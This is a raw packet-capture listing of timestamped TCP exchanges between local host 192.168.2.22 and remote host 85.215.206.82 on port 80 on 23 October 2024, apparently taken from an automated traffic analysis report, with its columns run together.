                                                                                                                                                                        Oct 23, 2024 17:27:19.599421978 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599452972 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621387005 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621411085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621423960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621479034 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621509075 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621563911 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621572018 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621583939 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621628046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.622010946 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622023106 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622035980 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622062922 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.662961960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.662991047 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.663002968 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.663187027 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696258068 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696317911 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696330070 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696455002 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696468115 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696486950 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696486950 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696531057 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696705103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696724892 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696734905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696760893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718065977 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718079090 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718121052 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718132973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718184948 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718193054 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718206882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718219995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718347073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718347073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718730927 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718750954 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718761921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718801022 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.719119072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.719136000 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.719186068 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740539074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740578890 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740591049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740659952 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740693092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740704060 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740835905 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740885019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740940094 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740952015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740993023 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.781908989 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.781925917 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.781949043 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.782100916 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.815817118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815829992 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815841913 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815958977 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815972090 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815992117 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.816026926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.816179991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816206932 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816216946 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816262960 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.837883949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837917089 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837929010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837992907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838037014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838047981 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838089943 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838470936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838488102 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838500023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838511944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838524103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838534117 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838556051 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.839188099 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.839240074 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.859743118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859755993 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859772921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859842062 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.859869957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859939098 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859951019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859982967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.860068083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.860080004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.860120058 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.900999069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901032925 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901047945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901259899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.934999943 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935017109 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935029030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935040951 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935054064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935065031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935076952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935092926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935098886 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935194016 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.935194016 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.956890106 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.956914902 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.956947088 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.956969976 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.957103014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957115889 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957129955 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957144976 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.957173109 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.957603931 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957673073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957685947 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957711935 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.957789898 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957803965 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.957827091 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.958441973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.958487034 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.958498955 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.958509922 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.958549976 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.978842020 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.978938103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.978948116 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.979022026 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.979057074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.979068995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.979082108 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.979094028 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.979101896 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.979135990 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.979868889 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.020299911 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.020318985 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.020333052 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.020463943 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.053706884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053730965 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053742886 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053889036 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053894043 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.053900003 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053913116 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.053942919 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.054073095 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.054085016 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.054126024 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.054711103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.054766893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.076139927 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076174021 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076184988 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076251030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076265097 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076278925 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076287985 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.076317072 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.076827049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076839924 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076852083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.076880932 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.077003002 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.077055931 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.077434063 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.077446938 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.077460051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.077481985 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.077673912 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.077723026 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.098951101 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.098967075 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.098980904 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.098994970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099005938 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099018097 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099031925 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099044085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099050045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.099066973 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.099085093 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.139612913 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.139631987 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.139646053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.139743090 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.173077106 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173093081 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173110962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173124075 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173137903 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173151970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173208952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173212051 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.173223019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173228979 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.173274994 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.173898935 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173914909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173922062 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.173979998 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.195615053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195755005 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195766926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195780993 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195791960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195805073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195811987 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195817947 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.195867062 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.195887089 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.196208000 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.196306944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.196320057 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.196374893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.217197895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217407942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217441082 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217536926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.217600107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217645884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217655897 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.217727900 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217745066 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.217780113 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.218202114 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.218322992 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.218381882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.218462944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.218475103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.218492031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.218522072 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.258784056 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.258804083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.258817911 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.258963108 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.292139053 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292157888 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292172909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292213917 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.292447090 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292460918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292474031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292510033 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.292678118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292691946 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292711973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292741060 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.292810917 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.292862892 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.293205023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.293679953 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.293735027 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.314702034 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314718962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314732075 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314794064 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.314977884 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.314990997 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315002918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315016031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315032959 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315058947 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315371037 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315426111 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315438986 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315449953 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.315473080 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.315491915 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336639881 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336658001 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336669922 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336757898 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336769104 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336770058 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336781979 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336931944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.336944103 CEST804917385.215.206.82192.168.2.22
